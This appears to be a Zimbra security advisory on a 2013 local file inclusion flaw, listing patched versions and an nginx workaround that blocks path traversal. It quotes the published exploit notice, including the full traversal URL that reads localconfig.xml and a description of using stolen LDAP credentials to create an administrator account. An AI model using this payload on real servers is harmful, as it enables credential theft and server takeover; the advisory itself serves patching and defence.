Overview:
A reportedly "0day Exploit" was posted on Twitter on Friday, December 06, 2013. However, please note - Zimbra has previously released a fix for this Security bug.

Release Info:
This vulnerability was identified in Feb 2013, and a fix released by Zimbra in Feb 2013. The bug number was the following (note: it is locked, so the full details are not currently public):

Vulnerability about skin/branding feature, sensitive information can be retrieved
Access Denied
Fixed: 7.2.2 Patch 2, 7.2.3, 8.0.2 Patch 1, 8.0.3

A notification for this issue was published to the Zimbra Support Portal on Feb 26, 2013: https://support.zimbra.com/node/346
Also, a notification was included in these Release Notes:


8.0.2 Patch 1: http://files2.zimbra.com/website/doc...h_8_0_2_r1.pdf - February 19, 2013: Patch 8.0.2 P1 patch fixes the following bug: Bug 80338 Security Fix
7.2.2 Patch 2: http://files2.zimbra.com/website/doc...h_7_2_2_r1.pdf - February 19, 2013: Patch 7.2.2 P2 patch fixes the following bug: Bug 80338 Security Fix

ZCS7 Customers:
ZCS7 Customers should upgrade to 7.2.2 Patch 2 or later (7.2.5 is the latest, and 7.2.6 will be released in the near future). Customers running these versions should not be vulnerable.

ZCS8 Customers:
ZCS8 Customers should upgrade to 8.0.2 Patch 1 or later (8.0.5 is the latest, and 8.0.6 will be released in the near future). Customers running these versions should not be vulnerable.

Workaround:
If using Nginx or other proxy, you could use a configuration like the following to some effect:

You need to add the below 3 lines to
"nginx.conf.web.[http|https].default.template":

if ($request_uri ~ "\.\.") {
return 404;
}
if ($request_uri ~ "\%2[eE]\%2[eE]") {
return 404;
}

Then run:

$ zmproxyconfgen
$ zmproxyctl restart

Published Exploit:

Originally posted to Twitter: https://twitter.com/DigitalCTF

Zimbra - 0day exploit / Privilegie escalation via LFI

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: Zimbra offers Open Source email server software and shared calendar for Linux and the Mac.
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubunutu.
# CVE : No CVE, no patch just 0Day
# State : Critical

# Mirror: http://www.exploit-db.com/sploits/zi..._rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx %20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.

LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx %20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Example :

https://mail.example.com/res/I18nMsg...Keys,ZmKeys,Zd...

or

https://mail.example.com:7071/zimbra...Msg,ZMsg,ZmMsg,...

----------------Exploit-----------------
Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.

use the exploit like this :
ruby run.rb -t mail.example.com -u someuser -p Test123_23
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials[*] Login URL : https://mail.example.com:7071/zimbraAdmin/[*] Account : someuser@example.com[*] Password : Test123_23
[+] Successfully Exploited !

The number of servers vuln are huge like 80/100.
This is only for educational purpouses. (sic)